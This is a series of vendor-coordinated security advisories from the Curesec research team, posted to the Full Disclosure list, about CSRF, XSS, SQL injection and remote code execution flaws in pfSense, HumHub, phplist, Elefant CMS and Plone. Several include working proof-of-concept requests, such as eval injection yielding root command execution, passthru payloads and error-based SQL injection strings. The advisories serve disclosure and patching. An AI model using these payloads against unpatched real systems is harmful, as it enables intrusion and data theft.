[FD] pfsense 2.3.2: CSRF
Security Advisory - Curesec Research Team 1. Introduction Affected Product:pfsense 2.3.2 Fixed in:2.3.3 Fixed Version Link: https://pfsense.org/download/ Vendor Website: https://www.pfsense.org/ Vulnerability Type: CSRF Remote Exploitable: Yes Reported to vendor: 02/06/2017 Disclosed to public: 03/24/2017 Release mode:Coordinated Release CVE: requested via DWF Credits Tim Coen of Curesec GmbH 2. Overview pfsense is an open source firewall. The web interface is written in PHP. In version 2.3.2-RELEASE (amd64), the actions of creating and deleting firewall rules are vulnerable to CSRF, enabling an Attacker to edit these rules with a little bit of social engineering. 3. Details CVSS: Medium; 5.4 https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/ PR:N/UI:R/S:U/C:N/I:L/A:L Description: The easyrule.php script is vulnerable to CSRF, which allows an attacker to create or delete firewall rules via CSRF. Proof of Concept: GET /easyrule.php?action=pass&int=LAN&proto=any&src=192.168.1.1&dst=192.168.1.1 &dstport=80&ipproto=inet 4. Solution To mitigate this issue please upgrade at least to version 2.3.3: https://pfsense.org/download/ Please note that a newer version might already be available. 5. Report Timeline 02/06/2017 Informed Vendor about Issue 02/07/2017 Vendor confirms + fixes issues in git 02/20/2017 Vendor relases fix + vendor advisory 03/24/2017 Disclosed to public Blog Reference: https://www.curesec.com/blog/article/blog/pfsense-232-CSRF-198.html -- blog: https://www.curesec.com/blog Atom Feed: https://www.curesec.com/blog/feed.xml RSS Feed: https://www.curesec.com/blog/rss.xml tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Josef-Orlopp-Straße 54 10365 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] pfsense 2.3.2: XSS
Security Advisory - Curesec Research Team 1. Introduction Affected Product:pfsense 2.3.2 Fixed in:2.3.3 Fixed Version Link: https://pfsense.org/download/ Vendor Website: https://www.pfsense.org/ Vulnerability Type: XSS Remote Exploitable: Yes Reported to vendor: 02/06/2017 Disclosed to public: 03/24/2017 Release mode:Coordinated Release CVE: requested via DWF Credits Tim Coen of Curesec GmbH 2. Overview pfsense is an open source firewall. The web interface is written in PHP. In version 2.3.2-RELEASE (amd64), it is vulnerable to reflected XSS. XSS can lead to disclosure of cookies, session tokens etc. 3. Details XSS 1 CVSS: Medium; 6.1 https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/ PR:N/UI:R/S:C/C:L/I:L/A:N Description: When performing a package reinstall via the package manager, the "from" and "to" parameter are vulnerable to reflected XSS. Proof of Concept: http://192.168.178.60/pkg_mgr_install.php?mode=reinstallpkg&pkg= pfSense-pkg-arping&from='">&to='"> Note that while the "pkg" parameter must be a valid package, it does not need to actually be installed on the system. Code: pkg_mgr_install.php XSS 2 CVSS: Medium; 4.7 https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/ PR:N/UI:R/S:C/C:L/I:L/A:N Description: The pkg_filter Parameter of the pkg.php file is vulnerable to reflected XSS. It should be noted that the xml Parameter must point to an existing xml file, which must contain a field with the type sorting and the include_filtering_inputbox tag set. According to the vendor, the FreeRADIUS package is affected. Proof of Concept: 192.168.10.150/pkg.php?xml=miniupnpd.xml&pkg_filter='"> Code: pkg.php echo " Filter text: "; 4. Solution To mitigate this issue please upgrade at least to version 2.3.3: https://pfsense.org/download/ Please note that a newer version might already be available. 5. Report Timeline 02/06/2017 Informed Vendor about Issue 02/07/2017 Vendor confirms + fixes issues in git 02/20/2017 Vendor relases fix + vendor advisory 03/24/2017 Disclosed to public Blog Reference: https://www.curesec.com/blog/article/blog/pfsense-232-XSS-197.html -- blog: https://www.curesec.com/blog Atom Feed: https://www.curesec.com/blog/feed.xml RSS Feed: https://www.curesec.com/blog/rss.xml tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Josef-Orlopp-Straße 54 10365 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] pfsense 2.3.2: Code Execution
Security Advisory - Curesec Research Team 1. Introduction Affected Product:pfsense 2.3.2 Fixed in:2.3.3 Fixed Version Link: https://pfsense.org/download/ Vendor Website: https://www.pfsense.org/ Vulnerability Type: Code Execution Remote Exploitable: Yes Reported to vendor: 02/06/2017 Disclosed to public: 03/24/2017 Release mode:Coordinated Release CVE: requested via DWF Credits Tim Coen of Curesec GmbH 2. Overview pfsense is an open source firewall. The web interface is written in PHP. In version 2.3.2-RELEASE (amd64), the setup wizard is vulnerable to code execution. It should be noted that by default, only an administrator can access the setup wizard. By default, administrators have far-reaching permissions via the wizard and via other functionality. There are however some custom configurations where this vulnerability could lead to privilege escalation or undesired code execution. Unknown to us, this issue was previously discussed on the github page of opnsense - a fork of pfsense - , although it was not classified as a vulnerability. 3. Details CVSS: Medium; 6.8 https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/ PR:H/UI:N/S:U/C:H/I:H/A:H When updating a config field, user input is passed to eval. For most config types the input is sanitized. However, the sanitation can be bypassed and there is no sanitation for the config type interfaces_selection. Both of these issues can lead to code execution. An attacker needs an account with the privilege to use the wizard ("WebCfg - pfSense wizard subsystem page"). The attack still works even if the privilege "User - Config - Deny Config Write" is set, which would normally prevent the user from performing changes on the server or from resetting the admin password. To reproduce the issue, visit https://192.168.10.150/wizard.php?xml= openvpn_wizard.xml, follow the instructions, and at the step that the parameter "interface" is used, use wan";echo exec("id");" as value. Note also that the addslashes filter for types other than interfaces_selection can be bypassed via ${passthru($_GET[x])}. Proof of Concept: POST /wizard.php HTTP/1.1 Host: 192.168.10.150 Content-Length: 506 __csrf_magic =sid%3A57913ee89f117b1d40fec5c590fe10d401717053%2C1450275812&xml= openvpn_wizard.xml&stepid=9&interface=wan";echo exec("id");"&protocol=TCP& localport=1194&description=fyjfyfyj&tlsauthentication=on&generatetlskey=on& dhparameters=2048&crypto=AES-256-CBC&digest=SHA1&engine=none&tunnelnet=& localnet=&concurrentcon=&compression=&dynip=on&addrpool=on&defaultdomain=& dnsserver1=&dnserver2=&dnserver3=&dnserver4=&ntpserver1=&ntpserver2=&nbttype=0& nbtscope=&winsserver1=&winsserver2=&advanced=&next=Next -> uid=0(root) gid=0 (wheel) groups=0(wheel) Code: /wizard.php function update_config_field($field, $updatetext, $unset, $arraynum, $field_type) { [...] if($field_type == "interfaces_selection") { $var = "\$config{$field_conv}"; $text = "if (isset({$var})) unset({$var});"; $text .= "\$config" . $field_conv . " = \"" . $updatetext . "\";"; eval($text); return; } [..] $text = "\$config" . $field_conv . " = \"" . addslashes ($updatetext) . "\";"; eval($text); } 4. Solution To mitigate this issue please upgrade at least to version 2.3.3: https://pfsense.org/download/ Please note that a newer version might already be available. 5. Report Timeline 02/06/2017 Informed Vendor about Issue 02/07/2017 Vendor confirms + fixes issues in git 02/20/2017 Vendor relases fix + vendor advisory 03/24/2017 Disclosed to public Blog Reference: https://www.curesec.com/blog/article/blog/pfsense-232-Code-Execution-199.html -- blog: https://www.curesec.com/blog Atom Feed: https://www.curesec.com/blog/feed.xml RSS Feed: https://www.curesec.com/blog/rss.xml tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Josef-Orlopp-Straße 54 10365 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] HumHub 0.20.1 / 1.0.0-beta.3: Code Execution
Security Advisory - Curesec Research Team 1. Introduction Affected Product: HumHub 0.20.1 / 1.0.0-beta.3 Fixed in: 1.0.0 Fixed Version https://www.humhub.org/en/download/default/form?version=1.0.0 Link: &type=zip Vendor Website: https://www.humhub.org/ Vulnerability Code Execution Type: RemoteYes Exploitable: Reported to 01/10/2016 vendor: Disclosed to 03/17/2017 public: Release mode: Coordinated Release CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview HumHub is a social media platform written in PHP. In version 0.20.1 as well as 1.0.0-beta.3, it is vulnerable to Code Execution as some functionality allows the uploading of PHP files. Successfull exploitation requires specific server settings. A user account is required as well, but registration is open by default. 3. Details CVSS: High 7.6 AV:N/AC:H/Au:N/C:C/I:C/A:C Most of the file uploads of HumHub check the file extension or file type before uploading a file. However, the file upload of the "What's on your mind?"-text box allows upload of arbitrary files. A htaccess file forbids the execution of PHP code in uploaded files, but some servers are configured to not read htaccess files. This is for example the case with default Apache configurations. Because of this, uploaded files should be checked to not have dangerous file extensions. An account is needed, but the registration is open by default. An admin does have the option to configure what files are allowed here: http:// localhost/humhub-0.20.0/index.php?r=admin%2Fsetting%2Ffile. But by default, all files are allowed (although .htaccess is renamed). It should also be noted that the documentation specifically mentions that the upload directory needs to be protected. However, it is to be assumed that not all users follow this suggestion, especially as there is no warning in the installation process itself. Proof of Concept: POST /humhub-0.20.1/index.php?r=file%2Ffile%2Fupload&objectModel=&objectId= HTTP/1.1 Host: localhost Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-CSRF-Token: TzMwdHgxWkcafVg5EHsjKyBeQS0fUCMBeHdxPg1wDiV2cEZZN3xrDw== X-Requested-With: XMLHttpRequest Content-Length: 1080 Content-Type: multipart/form-data; boundary =---101749290911301792911842334968 Cookie: [...] Connection: keep-alive Pragma: no-cache Cache-Control: no-cache -101749290911301792911842334968 Content-Disposition: form-data; name="_csrf" TzMwdHgxWkcafVg5EHsjKyBeQS0fUCMBeHdxPg1wDiV2cEZZN3xrDw== -101749290911301792911842334968 Content-Disposition: form-data; name="message" -101749290911301792911842334968 Content-Disposition: form-data; name="notifyUserInput" -101749290911301792911842334968 Content-Disposition: form-data; name="containerGuid" 3edb07bd-969f-4da3-a4bc-3e2f92a6474c -101749290911301792911842334968 Content-Disposition: form-data; name="containerClass" humhub\modules\user\ models\User -101749290911301792911842334968 Content-Disposition: form-data; name="fileList" -101749290911301792911842334968 Content-Disposition: form-data; name="files[]"; filename="test.php" Content-Type: application/x-php https://www.humhub.org/en/download/default/form?version=1.0.0&type=zip Please note that a newer version might already be available. 5. Report Timeline 01/10/2016 Informed Vendor about Issue 01/12/2016 Vendor confirms issue 02/10/2016 Vendor requests more time 03/27/2016 Vendor releases fix 03/17/2017 Disclosed to public Blog Reference: https://www.curesec.com/blog/article/blog/HumHub-0201--100-beta3-Code-Execution-196.html -- blog: https://www.curesec.com/blog Atom Feed: https://www.curesec.com/blog/feed.xml RSS Feed: https://www.curesec.com/blog/rss.xml tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Josef-Orlopp-Straße 54 10365 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] HumHub 1.0.1: XSS
Security Advisory - Curesec Research Team 1. Introduction Affected Product: HumHub 1.0.1 and earlier Fixed in: 1.1.1 Fixed Version https://www.humhub.org/en/download/default/form?version=1.1.1 Link: &type=zip Vendor Website: https://www.humhub.org/ Vulnerability XSS Type: RemoteYes Exploitable: Reported to 01/10/2016 vendor: Disclosed to 03/17/2017 public: Release mode: Coordinated Release CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview HumHub is a social media platform written in PHP. In version 1.0.1 and earlier, it is vulnerable to a reflected XSS attack if debugging is enabled, as well as a self-XSS attack. This allows an attacker to steal cookies, inject JavaScript keyloggers, or bypass CSRF protection. 3. Details XSS 1: Reflected XSS CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N Description: When the debug mode is enabled, which it is by default, the UserSearch parameter is vulnerable to reflected XSS. Additionally, the resulting error page discloses all cookies - even httpOnly cookies -, and the contents of the $_SERVER array. Proof of Concept: http://localhost/humhub-0.20.0/index.php?UserSearch[last_login]=alert (1)&r=admin%2Fuser XSS 2: DOM-based Self-XSS CVSS: Low 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N There is a reflected DOM-based self-XSS vulnerability in HumHub. It may be possible to exploit this issue via ClickJacking in some browsers. Proof of Concept: Visit the profile of a user: http://localhost/humhub-0.20.0/index.php?r= space%2Fspace&sguid=d2f06d0a-47e1-4549-b469-c8a1df48faca In the "What's on your mind?"-text box enter: '"> 4. Solution To mitigate this issue please upgrade at least to version 1.1.1: https://www.humhub.org/en/download/default/form?version=1.1.1&type=zip Please note that a newer version might already be available. 5. Report Timeline 01/10/2016 Informed Vendor about Issue 01/12/2016 Vendor confirms issue 02/10/2016 Vendor requests more time 08/16/2016 Vendor releases partial fix 09/26/2016 Vendor releases fix 03/27/2017 Disclosed to public Blog Reference: https://www.curesec.com/blog/article/blog/HumHub-101-XSS-195.html -- blog: https://www.curesec.com/blog Atom Feed: https://www.curesec.com/blog/feed.xml RSS Feed: https://www.curesec.com/blog/rss.xml tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Josef-Orlopp-Straße 54 10365 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] phplist 3.2.6: XSS
Security Advisory - Curesec Research Team 1. Introduction Affectedphplist 3.2.6 Product: Fixed in: 3.3.1 Fixed Version https://sourceforge.net/projects/phplist/files/phplist/3.3.1/ Link: phplist-3.3.1.zip/download Vendor Website: https://www.phplist.org/ Vulnerability XSS Type: Remote Yes Exploitable: Reported to 01/10/2017 vendor: Disclosed to02/20/2017 public: Release mode: Coordinated Release CVE:n/a (not requested) Credits Tim Coen of Curesec GmbH 2. Overview phplist is an application to manage newsletters, written in PHP. In version 3.2.6, it is vulnerable to Cross Site Scripting. The application contains one reflected XSS, and multiple persistent XSS vulnerabilities. The persistent XSS vulnerabilities are only exploitable by users with specific privileges. 3. Details Reflected XSS CVSS: Medium 6.1 CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N The page parameter is vulnerable to reflected XSS. Proof of Concept: http://localhost/lists/admin/?page=send\'\">alert(8)&id=187&tk =c Persistent XSS CVSS: Medium 5.5 CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N Various components of the administration interface are vulnerable to persistent XSS. While a user account is required to exploit these issues, they may be used by less privileged users to escalate their privileges. Persistent XSS: List Name The name of a list is echoed in various locations without encoding, leading to persistent XSS. An account with the privilege to create a list is required. Add new List: http://localhost/lists/admin/?page=editlist&tk=c as name use : list'"> To trigger the payload, visit - Add new subscribers to list: http://localhost/lists/admin/?page=importsimple&list=84&tk =c - Overview of all lists: http://localhost/lists/admin/?page=list&tk=c - List members of list: http://localhost/lists/admin/?page=members&id=3&tk=c - View member (loaded as part of the lists tab): http://localhost/lists/admin/?page= user&id=4 - Creating a Campaign (in step 4): http://localhost/lists/admin/?page =send&id=2&tk=c&tab=Lists Persistent XSS: Subscribe Page Various parameters of the subscribe page - such as the title - are vulnerable to persistent XSS. An account with the privilege to edit the subscribe page is required. Add a new subscribe page: http://localhost/lists/admin/?page=spage as title use: subscribe'"> To trigget the payload: - Visit the subscribe page: http://localhost/lists/index.php?p=subscribe&id=1 - Visit the subscribe page overview: http://localhost/lists/admin/?page=spage Persistent XSS: Bounce Rule The expression parameter of bounce rules is vulnerable to persistent XSS. An account with the privilege to edit bounce rules is required. Add a new bounce rule:http://localhost/lists/admin/?page=bouncerules&type= active as regular expression use: test'"&ht;http://localhost/lists/ admin/?page=bouncerules&type=active 4. Solution To mitigate this issue please upgrade at least to version 3.3.1: https://sourceforge.net/projects/phplist/files/phplist/3.3.1/phplist-3.3.1.zip/ download Please note that a newer version might already be available. 5. Report Timeline 01/10/2017 Informed Vendor about Issue 01/16/2017 Vendor confirms 02/15/2017 Asked Vendor to confirm that new release fixes issues 02/15/2017 Vendor confirms 02/20/2017 Disclosed to public Blog Reference: https://www.curesec.com/blog/article/blog/phplist-326-XSS-194.html -- blog: https://www.curesec.com/blog Atom Feed: https://www.curesec.com/blog/feed.xml RSS Feed: https://www.curesec.com/blog/rss.xml tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Josef-Orlopp-Straße 54 10365 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] phplist 3.2.6: SQL Injection
Security Advisory - Curesec Research Team 1. Introduction Affectedphplist 3.2.6 Product: Fixed in: 3.3.1 Fixed Version https://sourceforge.net/projects/phplist/files/phplist/3.3.1/ Link: phplist-3.3.1.zip/download Vendor Website: https://www.phplist.org/ Vulnerability SQL Injection Type: Remote Yes Exploitable: Reported to 01/10/2017 vendor: Disclosed to02/20/2017 public: Release mode: Coordinated Release CVE:n/a (not requested) Credits Tim Coen of Curesec GmbH 2. Overview phplist is an application to manage newsletters, written in PHP. In version 3.2.6, it is vulnerable to SQL injection. The application contains two SQL injections, one of which is in the administration area and one which requires no credentials. Additionally, at least one query is not properly protected against injections. Furthermore, a query in the administration area discloses some information on the password hashes of users. 3. Details SQL Injection 1: Edit Subscription CVSS: High 7.1 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L It is possible for an unauthenticated user to perform an SQL injection when updating the subscription information of an already subscribed user. The protection against SQL injection relies on a combination of a custom magic quotes function which applies addslashes to all input values and a function which applies htmlspecialchars to all inputs. Additionally, some input values are cast to integers to prevent injections. addslashes protects against injections into arguments which are placed into single quotes, while htmlspecialchars protects against injections into double quotes. It should be noted that neither addslashes nor htmlspecialchars are recommended to prevent SQL Injection. The update functionality is vulnerable to SQL Injection as it uses the key of POST data, while only values of POST data are escaped via addslashes, but not keys. Proof of Concept: POST /lists/index.php?p=subscribe&uid=f8082b7cc4da7f94ba42d88ebfb5b1e2&email= foo%40example.com HTTP/1.1 Host: localhost Connection: close Content-Length: 209 email=foo%40example.com&emailconfirm=foo%40example.com&textemail=1&list%5B2 or extractvalue(1,version()) %5D=signup&listname%5B2%5D=newsletter& VerificationCodeX=&update=Subscribe+to+the+selected+newsletters%27 The proof of concept is chosen for simplicity and will only work if error messages are displayed to the user. If this is not the case, other techniques can be used to extract data from the database. Code: /lists/admin/subscribelib2.php $lists = ''; if (is_array($_POST['list'])) { while (list($key, $val) = each($_POST['list'])) { if ($val == 'signup') { $result = Sql_query("replace into {$GLOBALS['tables']['listuser']} (userid,listid,entered) values($userid,$key,now())"); # $lists .= " * ".$_POST ["listname"][$key]."\n"; } } } SQL Injection 2: Sending Campaign (Admin) CVSS: Medium 4.7 CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L When sending a campaign, the sendformat parameter is vulnerable to SQL injection. The injection takes place into an UPDATE, so the easiest way to extract data is via error based SQL injection. An account with the right to send campaigns is required to exploit this issue. Proof of Concept: POST /lists/admin/?page=send&id=2&tk=c&tab=Format HTTP/1.1 Host: localhost Cookie: PHPSESSID=k6m0jgl4niq7643hohik5jgm12 Connection: close Content-Length: 323 formtoken=27211e65922b95d986bfaf706ccd2ca0&workaround_fck_bug=1&followupto= http%3A%2F%2Flocalhost%2Flists%2Fadmin%2F%3Fpage%3Dsend%26id%3D2%26tk%3Dc%26tab%3DScheduling &htmlformatted=auto&sendformat=HTML" or extractvalue(1,version()) -- - &id=2& status=draft&id=2&status=draft&campaigntitle=campaign+meta%27%22%3E&testtarget= Code: // /lists/admin/send_core.php:198 $result = Sql_Query( sprintf('update %s set subject = "%s", fromfield = "%s", tofield = "%s", replyto ="%s", embargo = "%s", repeatinterval = "%s", repeatuntil = "%s", message = "%s", textmessage = "%s", footer = "%s", status = "%s", htmlformatted = "%s", sendformat = "%s", template = "%s" where id = %d', $tables['message'], sql_escape(strip_tags ($messagedata['campaigntitle'])), /* we store the title in the subject field. Better would be to rename the DB column, but this will do for now */ sql_escape ($messagedata['fromfield']), sql_escape($messagedata['tofield']), sql_escape ($messagedata['replyto']), sprintf('d-d-d d:d', $messagedata['embargo'] ['year'], $messagedata['embargo']['month'], $messagedata['embargo']['day'], $messagedata['embargo']['hour'], $messagedata['embargo']['minute']), $messagedata['repeatinterval'], sprintf('d-d-d d:d', $messagedata ['repeatuntil']['year'], $messagedata['repeatuntil']['month'], $messagedata ['repeatuntil']['day'], $messagedata['repeatuntil']['hour'], $messagedata ['repeatuntil']['minute']), sql_escape($messagedata['message']), sql_escape ($messagedata['textmessage']), sql_escape($messagedata['footer']), sql_escape ($messagedata['status']), $ht
[FD] Elefant CMS 1.3.12-RC: Code Execution
Security Advisory - Curesec Research Team 1. Introduction Affected Product: Elefant CMS 1.3.12-RC Fixed in: 1.3.13 Fixed Version https://github.com/jbroadway/elefant/releases/tag/ Link: elefant_1_3_13_rc Vendor Website:https://www.elefantcms.com/ Vulnerability Code Execution Type: Remote Yes Exploitable: Reported to09/05/2016 vendor: Disclosed to 02/02/2017 public: Release mode: Coordinated Release CVE: n/a (not requested) CreditsTim Coen of Curesec GmbH 2. Overview Elefant is a content managment system written in PHP. In version 1.3.12-RC, it is vulnerable to code execution because of two different vulnerabilities. It allows the upload of files with dangerous type, as well as PHP code injection. An account is required to exploit these issues. 3. Details Upload of file with dangerous type CVSS: High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C The file upload forbids the uploading of files with the .php extension, but allows uploading of files with a number of other dangerous extensions leading to code execution and XSS. A user account is required which has the right to upload and manage files. By default, the editor or admin role have this right. Proof of Concept: POST /filemanager/upload/drop HTTP/1.1 Host: localhost Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/ form-data; boundary=--multipartformboundary1472116478634 X-Requested-With: XMLHttpRequest Content-Length: 316 Cookie: PHPSESSID= 57uejmot41c4jsbtbac85mek55; elefant_update_checked=1; elefant_last_page= %2Fuser; elefant_user=nj86h42vi2j73tsturvq4slr05 Connection: close multipartformboundary1472116478634 Content-Disposition: form-data; name ="path" multipartformboundary1472116478634 Content-Disposition: form-data; name="file"; filename="test.php5" Content-Type: application/x-php http://localhost/designer/add/layout Enter {{passthru('id')}} In the textarea. 4. Solution To mitigate this issue please upgrade at least to version 1.3.13. Please note that a newer version might already be available. 5. Report Timeline 09/05/2016 Informed Vendor about Issue, Vendor announces fix 11/07/2016 Asked Vendor if recent releases fixes issues, Vendor confirmed 02/02/2017 Disclosed to public Blog Reference: https://www.curesec.com/blog/article/blog/Elefant-CMS-1312-RC-Code-Execution-188.html -- blog: https://www.curesec.com/blog tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Josef-Orlopp-Straße 54 10365 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Elefant CMS 1.3.12-RC: Code Execution
Security Advisory - Curesec Research Team 1. Introduction Affected Product: Elefant CMS 1.3.12-RC Fixed in: 1.3.13 Fixed Version https://github.com/jbroadway/elefant/releases/tag/ Link: elefant_1_3_13_rc Vendor Website:https://www.elefantcms.com/ Vulnerability Code Execution Type: Remote Yes Exploitable: Reported to09/05/2016 vendor: Disclosed to 02/02/2017 public: Release mode: Coordinated Release CVE: n/a (not requested) CreditsTim Coen of Curesec GmbH 2. Overview Elefant is a content managment system written in PHP. In version 1.3.12-RC, it is vulnerable to code execution because of two different vulnerabilities. It allows the upload of files with dangerous type, as well as PHP code injection. An account is required to exploit these issues. 3. Details Upload of file with dangerous type CVSS: High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C The file upload forbids the uploading of files with the .php extension, but allows uploading of files with a number of other dangerous extensions leading to code execution and XSS. A user account is required which has the right to upload and manage files. By default, the editor or admin role have this right. Proof of Concept: POST /filemanager/upload/drop HTTP/1.1 Host: localhost Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/ form-data; boundary=--multipartformboundary1472116478634 X-Requested-With: XMLHttpRequest Content-Length: 316 Cookie: PHPSESSID= 57uejmot41c4jsbtbac85mek55; elefant_update_checked=1; elefant_last_page= %2Fuser; elefant_user=nj86h42vi2j73tsturvq4slr05 Connection: close multipartformboundary1472116478634 Content-Disposition: form-data; name ="path" multipartformboundary1472116478634 Content-Disposition: form-data; name="file"; filename="test.php5" Content-Type: application/x-php http://localhost/designer/add/layout Enter {{passthru('id')}} In the textarea. 4. Solution To mitigate this issue please upgrade at least to version 1.3.13. Please note that a newer version might already be available. 5. Report Timeline 09/05/2016 Informed Vendor about Issue, Vendor announces fix 11/07/2016 Asked Vendor if recent releases fixes issues, Vendor confirmed 02/02/2017 Disclosed to public Blog Reference: https://www.curesec.com/blog/article/blog/Elefant-CMS-1312-RC-Code-Execution-188.html -- blog: https://www.curesec.com/blog tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Josef-Orlopp-Straße 54 10365 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Plone: XSS
Security Advisory - Curesec Research Team 1. Introduction Affected Product:Plone 5.0.5 Fixed in:Hotfix 20170117 Fixed Version Link: https://plone.org/security/hotfix/20170117 Vendor Contact: secur...@plone.org Vulnerability Type: XSS Remote Exploitable: Yes Reported to vendor: 09/05/2016 Disclosed to public: 01/26/2017 Release mode:Coordinated Release CVE: CVE-2016-7147 Credits Tim Coen of Curesec GmbH 2. Overview Plone is an open source CMS written in python. In version 5.0.5, the Zope Management Interface (ZMI) component is vulnerable to reflected XSS as it does not properly encode double quotes. 3. Details CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N Description: The search functionality of the management interface is vulnerable to reflected XSS. As the input is echoed into an HMTL attribute, an attacker can use double quotes to escape the current attribute and add new attributes to enter a JavaScript context. Proof of Concept: http://0.0.0.0:9090//Plone/manage_findResult?obj_metatypes%3Alist=all&; obj_ids%3Atokens=%22+autofocus+onfocus%3dalert(1)%3E&obj_searchterm=&obj_mspec= %3C&obj_mtime=&search_sub%3Aint=1&btn_submit=Find 4. Solution To mitigate this issue please apply the hotfix 20170117. Please note that a newer version might already be available. 5. Report Timeline 09/05/2016 Contacted Vendor, Vendor confirmed, Requested CVE 09/06/2016 CVE assigned 09/06/2016 Vendor requests 90 days to release fix 01/10/2017 Contacted Vendor Again, Vendor announces hotfix 01/17/2017 Vendor releases hotfix 01/26/2017 Disclosed to public Blog Reference: https://www.curesec.com/blog/article/blog/Plone-XSS-186.html -- blog: https://www.curesec.com/blog tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Josef-Orlopp-Straße 54 10365 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Elefant CMS 1.3.12-RC: CSRF
Security Advisory - Curesec Research Team 1. Introduction Affected Product: Elefant CMS 1.3.12-RC Fixed in: 1.3.13 Fixed Version https://github.com/jbroadway/elefant/releases/tag/ Link: elefant_1_3_13_rc Vendor Website:https://www.elefantcms.com/ Vulnerability CSRF Type: Remote Yes Exploitable: Reported to09/05/2016 vendor: Disclosed to 02/02/2017 public: Release mode: Coordinated Release CVE: n/a (not requested) CreditsTim Coen of Curesec GmbH 2. Overview Elefant is a content managment system written in PHP. In version 1.3.12-RC, it is vulnerable to cross site request forgery. If a victim visits a website that contains specifically crafted code while logged into Elefant, an attacker can for example create a new admin account without the victims knowledge. 3. Details CVSS: Medium 5.1 AV:N/AC:H/Au:N/C:P/I:P/A:P There is no CSRF protection for various components, allowing among other the creation of new admin accounts or XSS attacks. Proof of Concept: Create New Admin: http://localhost/user/add"; method ="POST"> XSS: http://localhost/designer/preview"; method="POST"> 4. Solution To mitigate this issue please upgrade at least to version 1.3.13. Please note that a newer version might already be available. 5. Report Timeline 09/05/2016 Informed Vendor about Issue, Vendor announces fix 11/07/2016 Asked Vendor if recent releases fixes issues, Vendor confirmed 02/02/2017 Disclosed to public Blog Reference: https://www.curesec.com/blog/article/blog/Elefant-CMS-1312-RC-CSRF-189.html -- blog: https://www.curesec.com/blog tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Josef-Orlopp-Straße 54 10365 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Elefant CMS 1.3.12-RC: Multiple Persistent and Reflected XSS
Security Advisory - Curesec Research Team 1. Introduction Affected Product: Elefant CMS 1.3.12-RC Fixed in: 1.3.13 Fixed Version https://github.com/jbroadway/elefant/releases/tag/ Link: elefant_1_3_13_rc Vendor Website:https://www.elefantcms.com/ Vulnerability XSS Type: Remote Yes Exploitable: Reported to09/05/2016 vendor: Disclosed to 02/02/2017 public: Release mode: Coordinated Release CVE: n/a (not requested) CreditsTim Coen of Curesec GmbH 2. Overview Elefant is a content managment system written in PHP. In version 1.3.12-RC, it is vulnerable to multiple persistent as well as a reflected XSS issue. This allows an attacker to steal cookies, inject JavaScript keyloggers, or bypass CSRF protection. 3. Details Persistent XSS: Username CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N The username is echoed in various locations in the administration backend without encoding, leading to persistent XSS vulnerabilities. A user account is required, but the registration is open by default. Proof of Concept: 1. Register a new user (the registration is open by default). 2. Update the profile, as name use: Username To trigger the payload: 1. Log in as admin 2. View the edit page for the user, for example: http://localhost/user/edit?id=3 Alternatively, the payload is also echoed on the page listing all users: http://localhost/admin/versions?id=&type=User As well as on the version page: http://localhost/admin/versions?type=User&id=3 Persistent XSS: Version Comparison CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N Various fields of various components are echoed unencoded when comparing versions of those components. Examples are the user profile 